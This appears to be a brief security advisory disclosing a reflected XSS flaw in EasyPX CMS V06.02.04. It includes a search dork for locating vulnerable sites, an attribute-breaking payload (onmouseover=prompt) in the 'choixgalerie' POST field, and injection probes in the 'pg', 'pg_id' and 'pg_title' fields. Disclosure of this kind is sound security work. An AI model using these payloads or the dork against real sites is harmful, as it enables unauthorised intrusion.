==================================================================================================================================== | # Title : EasyPX CMS V06.02.04 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.domphp.com/ | | # Dork : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] This vulnerability affects : /tst/index.php URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad=" The input is reflected inside a tag parameter between double quotes. URL encoded POST input pg was set to system/fnc/readpg.php'"()&% URL encoded POST input pg was set to modules/login/inscription.php'"()&% URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&% URL encoded POST input pg_title was set to RSS'"()&% Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================